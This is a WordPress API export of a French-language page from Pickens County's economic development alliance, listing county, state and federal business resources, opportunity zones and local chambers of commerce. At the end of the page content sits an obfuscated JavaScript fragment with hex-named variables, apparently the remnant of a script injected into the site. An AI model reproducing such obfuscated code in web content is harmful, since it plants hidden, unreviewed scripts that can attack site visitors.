{"id":6113,"date":"2020-10-28T14:30:06","date_gmt":"2020-10-28T14:30:06","guid":{"rendered":"http:\/\/alliancepickens.com\/ressources-disponibles\/"},"modified":"2020-12-04T20:13:58","modified_gmt":"2020-12-04T20:13:58","slug":"ressources-disponibles","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/fr\/ressources-disponibles\/","title":{"rendered":"Ressources disponibles"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221; el_id=&#8221;pickens_county_resources&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_empty_space height=&#8221;30px&#8221;][vc_single_image image=&#8221;5107&#8243; img_size=&#8221;full&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;http:\/\/alliancepickens.com\/resources-avilable\/data-center-population\/&#8221;][vc_empty_space height=&#8221;30px&#8221;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;Dans cette section&#8221; nav_menu=&#8221;23&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;pcr&#8221;][vc_column][vc_column_text]<\/p>\n<h2>Ressources du comt\u00e9 de Pickens<\/h2>\n<p>[\/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text]<img loading=\"lazy\" decoding=\"async\" class=\"alignright size-full wp-image-10713\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/pickenscoutybadge.jpg\" alt=\"\" width=\"303\" height=\"357\" srcset=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/pickenscoutybadge.jpg 303w, https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/pickenscoutybadge-255x300.jpg 255w\" sizes=\"auto, (max-width: 303px) 100vw, 303px\" \/>Chez Alliance Pickens, notre objectif est de fournir aux membres de la communaut\u00e9 industrielle existante, ainsi qu\u2019aux entreprises qui pourraient \u00eatre int\u00e9ress\u00e9es \u00e0 en apprendre davantage sur le comt\u00e9 de Pickens, l\u2019information dont ils ont besoin pour prendre des d\u00e9cisions d\u2019affaires \u00e9clair\u00e9es. Si notre bureau peut \u00eatre utile pour l\u2019expansion ou la r\u00e9installation de votre entreprise \u00e0 Pickens County.South Carolina.USA, veuillez <a href=\"http:\/\/alliancepickens.hosted.civiclive.com\/cms\/One.aspx?portalId=10351&amp;pageId=13653\">contacter notre bureau.<\/a><\/p>\n<p>L\u2019Alliance de d\u00e9veloppement \u00e9conomique du comt\u00e9 de Pickens (Alliance Pickens) est habilit\u00e9e par le gouvernement du comt\u00e9 de Pickens et travaille en \u00e9troite collaboration avec lui. Les entreprises peuvent n\u00e9gocier avec le comt\u00e9 de Pickens pour obtenir des incitations, et toutes les lignes directrices fiscales sont fournies par le comt\u00e9 de Pickens ou l\u2019\u00c9tat de Caroline du Sud.<\/p>\n<p><span style=\"font-weight: 400\">Le gouvernement du comt\u00e9 de Pickens s\u2019engage \u00e0 fournir des services opportuns, efficaces, courtois et professionnels \u00e0 tous les citoyens du comt\u00e9 de Pickens. Le comt\u00e9 de Pickens prend des d\u00e9cisions qui favorisent l\u2019int\u00e9r\u00eat sup\u00e9rieur de la collectivit\u00e9 et \u00e9laborent les ressources, les politiques, les plans et les proc\u00e9dures n\u00e9cessaires pour r\u00e9pondre efficacement aux besoins du public. Les repr\u00e9sentants du gouvernement du comt\u00e9 poursuivent et appuient les programmes et les projets qui respectent le mieux les priorit\u00e9s du Conseil du comt\u00e9 de Pickens.<\/span><\/p>\n<p><a class=\"greenbtn\" href=\"https:\/\/www.co.pickens.sc.us\" target=\"_blank\" rel=\"noopener noreferrer\">Pour en savoir plus<\/a>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][vc_empty_space][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; el_class=&#8221;er&#8221; el_id=&#8221;entrepreneurial_resources&#8221;][vc_column][vc_column_text el_id=&#8221;er&#8221;]<\/p>\n<h2>Ressources entrepreneuriales<\/h2>\n<p>Gr\u00e2ce \u00e0 l\u2019environnement pro-business de Pickens County.South Carolina.USA, les propri\u00e9taires de petites entreprises sont en mesure de prosp\u00e9rer. Des ressources f\u00e9d\u00e9rales, \u00e9tatiques et locales sont disponibles pour soutenir les efforts des propri\u00e9taires de petites entreprises, que vous ne soyez que de commencer votre entreprise ou de travailler sur un plan qui l\u2019aidera \u00e0 cro\u00eetre.[\/vc_column_text][vc_empty_space][vc_row_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-6124\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/logo-sbdc.png\" alt=\"\" width=\"174\" height=\"66\"> <a href=\"https:\/\/www.scsbdc.com\/\" target=\"_blank\" rel=\"noopener noreferrer\">Pour en savoir plus<\/a><\/p>\n<p>En vertu d\u2019une entente de coop\u00e9ration avec la Small Business Administration des \u00c9tats-Unis, le programme small business development center (SC SBDC) a \u00e9t\u00e9 mis sur pied pour aider les petites entreprises en d\u00e9marrage et pour aider \u00e0 la croissance continue des petites entreprises \u00e0 travers le pays. Le programme est soutenu par des fonds f\u00e9d\u00e9raux, d\u2019\u00c9tat et priv\u00e9s et est ouvert \u00e0 tout propri\u00e9taire actuel ou potentiel de petites entreprises g\u00e9n\u00e9ralement sans frais.[\/vc_column_text][vc_empty_space][vc_column_text]<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-6133\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/logo-scdoc.png\" alt=\"\" width=\"193\" height=\"57\"> <a href=\"https:\/\/www.sccommerce.com\/\" target=\"_blank\" rel=\"noopener noreferrer\">Pour en savoir plus<\/a><\/p>\n<p>Le d\u00e9partement du Commerce de SC offre une vari\u00e9t\u00e9 ou des ressources pour les petites entreprises, y compris leur Guide des ressources commerciales.[\/vc_column_text][vc_empty_space][vc_column_text]<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-6150\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/logo-scbos.png\" alt=\"\" width=\"149\" height=\"50\"> <a href=\"https:\/\/scbos.sc.gov\/\">Pour en savoir plus<\/a><\/p>\n<p>Le South Carolina Business One Stop ou SCBOS est le portail web officiel d\u2019affaires de Caroline du Sud.[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-6165\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/logo-smbcc.png\" alt=\"\" width=\"167\" height=\"61\"> <a href=\"http:\/\/osmba.sc.gov\/\" target=\"_blank\" rel=\"noopener noreferrer\">Pour en savoir plus<\/a><\/p>\n<p>Les objectifs du Bureau de l\u2019aide aux petites et petites entreprises (OSMBA) sont de promouvoir la croissance et le d\u00e9veloppement des petites entreprises appartenant \u00e0 des minorit\u00e9s en Caroline du Sud et de pr\u00e9coniser l\u2019octroi d\u2019une partie \u00e9quitable des march\u00e9s publics aux petites entreprises appartenant \u00e0 des minorit\u00e9s.[\/vc_column_text][vc_empty_space][vc_column_text]<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-6179\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/logo-sba.png\" alt=\"\" width=\"97\" height=\"103\"> <a href=\"https:\/\/www.sba.gov\/\" target=\"_blank\" rel=\"noopener noreferrer\">Pour en savoir plus<\/a><\/p>\n<p>La Small Business Administration (SBA) des \u00c9tats-Unis a \u00e9t\u00e9 cr\u00e9\u00e9e en 1953 en tant qu\u2019organisme ind\u00e9pendant du gouvernement f\u00e9d\u00e9ral pour aider, conseiller, aider et prot\u00e9ger les int\u00e9r\u00eats des petites entreprises, pr\u00e9server la libre concurrence et maintenir et renforcer l\u2019\u00e9conomie globale de notre pays.[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;4767&#8243;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row el_id=&#8221;opportunity_zones&#8221;][vc_column][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_column_text]<a href=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/Opportunity-Zones-Flyer-Pickens-SC.pdf\" target=\"_blank\" rel=\"noopener noreferrer\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-5113\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/opportunityv2.jpg\" alt=\"\" width=\"482\" height=\"423\" srcset=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/opportunityv2.jpg 482w, https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/opportunityv2-300x263.jpg 300w\" sizes=\"auto, (max-width: 482px) 100vw, 482px\" \/><\/a><\/p>\n<p><a class=\"downloads\" href=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/Opportunity-Zones-Flyer-Pickens-SC.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">T\u00e9l\u00e9charger maintenant<\/a>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h2>Zones d\u2019opportunit\u00e9<\/h2>\n<p>[\/vc_column_text][vc_column_text]L\u2019incitatif de la zone d\u2019opportunit\u00e9 est un programme de d\u00e9veloppement communautaire con\u00e7u pour encourager les investissements priv\u00e9s \u00e0 long terme dans les collectivit\u00e9s \u00e0 faible revenu. Ce programme offre un incitatif fiscal f\u00e9d\u00e9ral aux contribuables qui r\u00e9investissent des gains en capital non r\u00e9alis\u00e9s dans des \u00ab fonds d\u2019opportunit\u00e9 \u00bb, qui sont des v\u00e9hicules sp\u00e9cialis\u00e9s vou\u00e9s \u00e0 l\u2019investissement dans des secteurs d\u00e9sign\u00e9s comme \u00ab zone d\u2019opportunit\u00e9 \u00bb. Dans le comt\u00e9 de Pickens, trois (3) secteurs de recensement ont \u00e9t\u00e9 choisis comme zone d\u2019opportunit\u00e9.<\/p>\n<p>Pour plus de d\u00e9tails, t\u00e9l\u00e9chargez le Pickens County <a href=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/Opportunity-Zones-Flyer-Pickens-SC.pdf\" target=\"_blank\" rel=\"noopener noreferrer\"><br \/>\n  <strong>Opportunity Zone Flyer<\/strong><br \/>\n<\/a><strong>.<\/strong><\/p>\n<p>Pour trouver des bureaux locaux disponibles et des propri\u00e9t\u00e9s industrielles situ\u00e9es dans Opportunity Zone, veuillez visiter nos pages <a href=\"http:\/\/alliancepickens.com\/fr\/sites-et-batiments\/\">Sites &amp; B\u00e2timents<\/a> et rechercher l\u2019ic\u00f4ne \u00ab Zone d\u2019opportunit\u00e9 \u00bb.[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row el_id=&#8221;chambers&#8221;][vc_column][vc_column_text]<\/p>\n<h2 style=\"text-align: center\">Chambres de commerce<\/h2>\n<p>[\/vc_column_text][vc_empty_space][vc_row_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_single_image image=&#8221;10359&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; img_link_target=&#8221;_blank&#8221; link=&#8221;https:\/\/www.clemsonareachamber.org\/&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center\"><a href=\"https:\/\/www.clemsonareachamber.org\/\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>R\u00e9gion de Clemson<\/strong><br \/>\nChambre de commerce<\/a><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_single_image image=&#8221;10352&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; img_link_target=&#8221;_blank&#8221; link=&#8221;https:\/\/www.easleychamber.org\/&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center\"><a href=\"https:\/\/www.easleychamber.org\/\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Plus grande Easley<\/strong><br \/>\nChambre de commerce<\/a><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_single_image image=&#8221;10345&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; img_link_target=&#8221;_blank&#8221; link=&#8221;https:\/\/www.explorepickens.com\/&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center\"><a href=\"https:\/\/www.explorepickens.com\/%22\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Grands Pickens<\/strong><br \/>\nChambre de commerce<\/a><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_single_image image=&#8221;10338&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; img_link_target=&#8221;_blank&#8221; link=&#8221;https:\/\/libertyareachamber.org\/&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center\"><a href=\"https:\/\/libertyareachamber.org\/\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Zone Liberty<\/strong><br \/>\nChambre de commerce<\/a><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][vc_empty_space][\/vc_column][\/vc_row][vc_row el_class=&#8221;learnmoreabout&#8221;][vc_column][vc_column_text]<\/p>\n<h4 style=\"text-align: center\">En savoir plus sur les ressources disponibles<\/h4>\n<p>[\/vc_column_text][vc_wp_custommenu nav_menu=&#8221;23&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Pr\u00eat \u00e0 commencer?<\/h1>\n<h3>Nous sommes impatients de vous parler!<\/h3>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/about-us\/contact-directions\/\">Contactez notre \u00e9quipe<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221; el_id=&#8221;pickens_county_resources&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_empty_space height=&#8221;30px&#8221;][vc_single_image image=&#8221;5107&#8243; img_size=&#8221;full&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;http:\/\/alliancepickens.com\/resources-avilable\/data-center-population\/&#8221;][vc_empty_space height=&#8221;30px&#8221;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;Dans cette section&#8221; nav_menu=&#8221;23&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;pcr&#8221;][vc_column][vc_column_text] Ressources du comt\u00e9 de Pickens [\/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text]Chez Alliance Pickens, notre objectif est de fournir aux membres de la communaut\u00e9 industrielle existante, ainsi qu\u2019aux entreprises qui pourraient \u00eatre int\u00e9ress\u00e9es \u00e0 en apprendre davantage sur le comt\u00e9 de Pickens, l\u2019information dont&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":20,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-6113","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Ressources disponibles - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/fr\/ressources-disponibles\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Ressources disponibles - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221; el_id=&#8221;pickens_county_resources&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_empty_space height=&#8221;30px&#8221;][vc_single_image image=&#8221;5107&#8243; img_size=&#8221;full&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;http:\/\/alliancepickens.com\/resources-avilable\/data-center-population\/&#8221;][vc_empty_space height=&#8221;30px&#8221;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;Dans cette section&#8221; nav_menu=&#8221;23&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;pcr&#8221;][vc_column][vc_column_text] Ressources du comt\u00e9 de Pickens [\/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text]Chez Alliance Pickens, notre objectif est de fournir aux membres de la communaut\u00e9 industrielle existante, ainsi qu\u2019aux entreprises qui pourraient \u00eatre int\u00e9ress\u00e9es \u00e0 en apprendre davantage sur le comt\u00e9 de Pickens, l\u2019information dont&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/fr\/ressources-disponibles\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-04T20:13:58+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/pickenscoutybadge.jpg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/ressources-disponibles\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/ressources-disponibles\\\/\",\"name\":\"Ressources disponibles - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/ressources-disponibles\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/ressources-disponibles\\\/#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/11\\\/pickenscoutybadge.jpg\",\"datePublished\":\"2020-10-28T14:30:06+00:00\",\"dateModified\":\"2020-12-04T20:13:58+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/ressources-disponibles\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/ressources-disponibles\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/ressources-disponibles\\\/#primaryimage\",\"url\":\"http:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/11\\\/pickenscoutybadge.jpg\",\"contentUrl\":\"http:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/11\\\/pickenscoutybadge.jpg\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/ressources-disponibles\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Ressources disponibles\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Ressources disponibles - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/fr\/ressources-disponibles\/","og_locale":"fr_FR","og_type":"article","og_title":"Ressources disponibles - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221; el_id=&#8221;pickens_county_resources&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_empty_space height=&#8221;30px&#8221;][vc_single_image image=&#8221;5107&#8243; img_size=&#8221;full&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;http:\/\/alliancepickens.com\/resources-avilable\/data-center-population\/&#8221;][vc_empty_space height=&#8221;30px&#8221;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;Dans cette section&#8221; nav_menu=&#8221;23&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;pcr&#8221;][vc_column][vc_column_text] Ressources du comt\u00e9 de Pickens [\/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text]Chez Alliance Pickens, notre objectif est de fournir aux membres de la communaut\u00e9 industrielle existante, ainsi qu\u2019aux entreprises qui pourraient \u00eatre int\u00e9ress\u00e9es \u00e0 en apprendre davantage sur le comt\u00e9 de Pickens, l\u2019information dont&hellip;","og_url":"https:\/\/alliancepickens.com\/fr\/ressources-disponibles\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-04T20:13:58+00:00","og_image":[{"url":"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/pickenscoutybadge.jpg","type":"","width":"","height":""}],"twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/fr\/ressources-disponibles\/","url":"https:\/\/alliancepickens.com\/fr\/ressources-disponibles\/","name":"Ressources disponibles - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/alliancepickens.com\/fr\/ressources-disponibles\/#primaryimage"},"image":{"@id":"https:\/\/alliancepickens.com\/fr\/ressources-disponibles\/#primaryimage"},"thumbnailUrl":"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/pickenscoutybadge.jpg","datePublished":"2020-10-28T14:30:06+00:00","dateModified":"2020-12-04T20:13:58+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/fr\/ressources-disponibles\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/fr\/ressources-disponibles\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/alliancepickens.com\/fr\/ressources-disponibles\/#primaryimage","url":"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/pickenscoutybadge.jpg","contentUrl":"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/pickenscoutybadge.jpg"},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/fr\/ressources-disponibles\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/fr\/"},{"@type":"ListItem","position":2,"name":"Ressources disponibles"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/fr\/#website","url":"https:\/\/alliancepickens.com\/fr\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/pages\/6113","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/comments?post=6113"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/pages\/6113\/revisions"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/media?parent=6113"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}